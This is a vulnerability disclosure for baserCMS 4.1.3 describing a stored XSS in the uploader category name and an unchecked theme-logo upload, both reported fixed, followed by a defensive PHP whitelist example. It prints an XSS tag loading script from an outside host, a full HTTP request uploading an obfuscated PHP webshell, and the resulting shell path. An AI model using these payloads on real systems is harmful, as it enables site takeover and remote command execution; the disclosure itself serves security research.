baserCMS Vulnerability Disclosure

Description

baserCMS is a Japanese-made CMS (content management system) that offers intuitive operation and high maintainability and lets you customise a website freely. It is open-source software built by Japanese developers for Japanese users. It is free to use, runs on a wide range of servers, and is easy to install.

Because it is based on the open-source framework CakePHP, it is highly customisable and easy to maintain.

It is a CMS with powerful content management features that let you manage static pages, blogs and forms together in a tree structure. The plugins a website needs at a minimum, such as the mail form and the recent blog posts list, and the framework of the admin screen are included from the start, and smartphones are supported out of the box.

Another strength of a domestic CMS is that Japanese is the default language of the manual and of the comments in the source code. (copied from https://basercms.net/about/index.html)

I found two vulnerabilities in baserCMS 4.1.3.

Stored XSS vulnerability (fixed)

There is a stored XSS vulnerability in the category name editor, reachable after logging in with ordinary administrator privileges.

Example

We register two administrator accounts with different permissions: システム管理 (system administration) and サイト運営 (site operation).
[Figure 1]
Log in to the system with the サイト運営-privileged account root:
[Figure 2]
In the Register New Category feature of the Upload menu, the category name field accepts a malicious XSS payload:
[Figure 3]
When the administrator logs in and opens the page, the payload is triggered:
[Figure 4]
So JavaScript inserted through this vulnerability runs in the administrator's browser and can perform actions with the administrator's privileges.
For example:
The root user does not have permission to access
http://127.0.0.1/basercms/admin/site_configs/del_cache to delete the server cache:
[Figure 5]
This vulnerability can be used to carry out the attack as follows:
Since the data[UploaderCategory][name] parameter has a length limit, we first insert the following statement:
<script src="http://vps_ip/1.js"></script>
Then 1.js uses Ajax to send a GET request to
http://127.0.0.1/basercms/admin/site_configs/del_cache:
[Figure 6]
Verification: the root (asda) user refreshes the page:
[Figure 7]
When the administrator user (ad_lab) opens the page, the JavaScript runs and deletes the server cache.
[Figure 8]
Finally, I located the defective code.
UploaderCategoriesController.php
[Figure 9]
The カテゴリ名 (category name, data[UploaderCategory][name]) parameter submitted by the user is not filtered for malicious characters.

Solution:

Note: The issue was reported in September 2018 and was resolved by a baserCMS developer. Announcement address

Code Execution Vulnerability (fixed)

Process

Download the latest version of baserCMS (4.1.3). In \basercms\lib\Baser\Model\ThemeConfig.php you can see that the extension of the uploaded file is not checked, so a webshell file can be uploaded directly.

The saveImage method of \basercms\lib\Baser\Model\ThemeConfig.php saves the logo during theme setup:
[Figure 10]
We can see the move_uploaded_file call. Auditing the code shows that the image is saved here without its extension being verified; only the file name is fixed (logo). So server access can be obtained by uploading a PHP webshell.
PoC:

POST /basercms/admin/theme_configs/form HTTP/1.1
Host: 127.0.0.1
Content-Length: 3986
Cache-Control: max-age=0
Origin: http://127.0.0.1
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfOCEZtinjMBherH4
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://127.0.0.1/basercms/admin/theme_configs/form
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: BASERCMS=vfshte61c73tufbvit1j63amv2
Connection: close

------WebKitFormBoundaryfOCEZtinjMBherH4
Content-Disposition: form-data; name="_method"

POST
------WebKitFormBoundaryfOCEZtinjMBherH4
Content-Disposition: form-data; name="data[_Token][key]"

65d6c82611c9eb9840aef42c97d82c36847093f574cbe4c2cb7964537a3d594b19d92b9c116bd3595e0f14ba510a880e1a2573033f81a71dd25800d09917183a
------WebKitFormBoundaryfOCEZtinjMBherH4
Content-Disposition: form-data; name="data[ThemeConfig][color_main]"

e371e3
------WebKitFormBoundaryfOCEZtinjMBherH4
Content-Disposition: form-data; name="data[ThemeConfig][color_sub]"

21b537
------WebKitFormBoundaryfOCEZtinjMBherH4
Content-Disposition: form-data; name="data[ThemeConfig][color_link]"

1808f5
------WebKitFormBoundaryfOCEZtinjMBherH4
Content-Disposition: form-data; name="data[ThemeConfig][color_hover]"

ed8815
------WebKitFormBoundaryfOCEZtinjMBherH4
Content-Disposition: form-data; name="data[ThemeConfig][logo]"; filename="x.php"
Content-Type: application/octet-stream

<?php $a = "a"."s"."s"."e"."r"."t"; $a($_GET[cc]); ?>
------WebKitFormBoundaryfOCEZtinjMBherH4
Content-Disposition: form-data; name="data[ThemeConfig][logo_alt]"

baserCMS
------WebKitFormBoundaryfOCEZtinjMBherH4
Content-Disposition: form-data; name="data[ThemeConfig][logo_link]"
...

Then, according to the code, the webshell path is:
http://127.0.0.1/basercms/files/theme_configs/logo.php
Command execution:
[Figure 11]

Solution:

Restrict the extensions of uploaded files with a whitelist (e.g. jpg, jpeg, png, gif).
Note: The issue was reported in September 2018 and was resolved by a baserCMS developer. Announcement address
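As an added example (not code from baserCMS or from the original post), this is the whitelist check the solution above calls for, written as standalone PHP and extended with a check that the bytes really are an image; the names safeLogoFilename, saveLogo and the constants are assumed for illustration, not functions from ThemeConfig.php:

```php
<?php
// Added example (not baserCMS's own code): whitelist check for a theme-logo
// upload of the kind the Solution above describes. safeLogoFilename() and
// saveLogo() are illustrative names, not functions from ThemeConfig.php.

const ALLOWED_LOGO_EXT = ['jpg', 'jpeg', 'png', 'gif'];

// Extension derived from the detected image type, so the saved name never
// depends on what the client called the file.
const IMAGETYPE_TO_EXT = [IMAGETYPE_GIF => 'gif', IMAGETYPE_JPEG => 'jpg', IMAGETYPE_PNG => 'png'];

function safeLogoFilename(string $clientName, string $tmpPath): ?string
{
    // 1. The client-supplied extension must be on the whitelist.
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_LOGO_EXT, true)) {
        return null;
    }
    // 2. The bytes must parse as an image; getimagesize() reads the header.
    $info = @getimagesize($tmpPath);
    if ($info === false || !isset(IMAGETYPE_TO_EXT[$info[2]])) {
        return null;
    }
    // 3. Fixed basename, extension taken from the content, never from the client.
    return 'logo.' . IMAGETYPE_TO_EXT[$info[2]];
}

function saveLogo(array $file, string $destDir): ?string
{
    if ($file['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    $name = safeLogoFilename($file['name'], $file['tmp_name']);
    if ($name === null) {
        return null;
    }
    $dest = rtrim($destDir, '/') . '/' . $name;
    return move_uploaded_file($file['tmp_name'], $dest) ? $dest : null;
}

// Constructed inputs: a minimal 1x1 GIF and a PHP payload like the PoC's.
$gif = "GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
     . "!\xf9\x04\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;";
file_put_contents($tmpGif = tempnam(sys_get_temp_dir(), 'logo'), $gif);
file_put_contents($tmpPhp = tempnam(sys_get_temp_dir(), 'logo'), '<?php echo 1; ?>');
var_dump(safeLogoFilename('x.php', $tmpPhp));    // the PoC's filename, PHP bytes
var_dump(safeLogoFilename('logo.gif', $tmpPhp)); // whitelisted name, PHP bytes
var_dump(safeLogoFilename('logo.gif', $tmpGif)); // whitelisted name, GIF bytes
unlink($tmpGif); unlink($tmpPhp);
```

Only the last call yields a filename; the first two are rejected by the extension whitelist and by the image-header check respectively, so a renamed script never reaches files/theme_configs/.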

Vulnerability information page:

https://basercms.net/security/CVE-2018-18942_CVE-2018-18943
